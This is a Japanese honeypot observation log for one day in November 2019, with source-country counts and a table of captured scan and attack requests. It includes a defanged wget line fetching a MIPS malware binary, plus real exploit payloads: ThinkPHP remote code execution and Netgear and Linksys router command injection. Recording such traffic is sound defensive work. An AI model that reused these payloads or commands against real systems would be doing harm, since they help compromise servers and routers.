WOWHoneypot観察(252日目)
2019/11/23(土)
トータルは200件でした。
ハンティングログは以下です。
24.154.105[.]191 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
中国 | 81 |
アメリカ | 52 |
ロシア | 15 |
ドイツ | 12 |
フランス | 7 |
インドネシア | 6 |
ブラジル | 4 |
インド | 3 |
オランダ | 2 |
イタリア | 2 |
ポーランド | 2 |
イラン | 2 |
セルビア | 1 |
レバノン | 1 |
トルコ | 1 |
台湾 | 1 |
ホンジュラス | 1 |
スイス | 1 |
アルゼンチン | 1 |
ボリビア | 1 |
イギリス | 1 |
香港 | 1 |
カナダ | 1 |
カンボジア | 1 |
件数 | 概要 | リクエスト |
---|---|---|
75 | アクセス | GET / |
11 | phpMyAdminの調査 | GET /scripts/setup.php |
10 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
10 | phpMyAdminの調査 | GET /phpmyadmin/setup.php |
10 | phpMyAdminの調査 | GET /phpmyadmin/scripts/_setup.php |
10 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
10 | HordeIMPの調査 | GET /imp/test.php |
10 | phpMyAdminの調査 | GET /_phpmyadmin/scripts/setup.php |
10 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
9 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
7 | ThinkPHPの調査 | GET /TP/public/index.php |
6 | ThinkPHPの調査 | POST /TP/public/index.php?s=captcha |
6 | ThinkPHPの調査 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
3 | Tomcat管理ページの調査 | GET /manager/html |
1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | PHPの設定内容の調査 | HEAD /phpinfo.php |
1 | PHPの設定内容の調査 | HEAD /%20phpinfo.php |
1 | 不正中継の調査 | GET hxxp[:]//www.youdao.com/?0.918428587610677633158124 |
1 | 不正中継の調査 | GET hxxp[:]//www.neti.ee/?0.54182092403494703466788 |
1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
1 | 調査 | GET /script |
1 | ASP管理ページの調査? | GET /manager/top.asp |
1 | 不明 | GET /js/preload/example.txt |
1 | 調査 | GET /cgi-bin |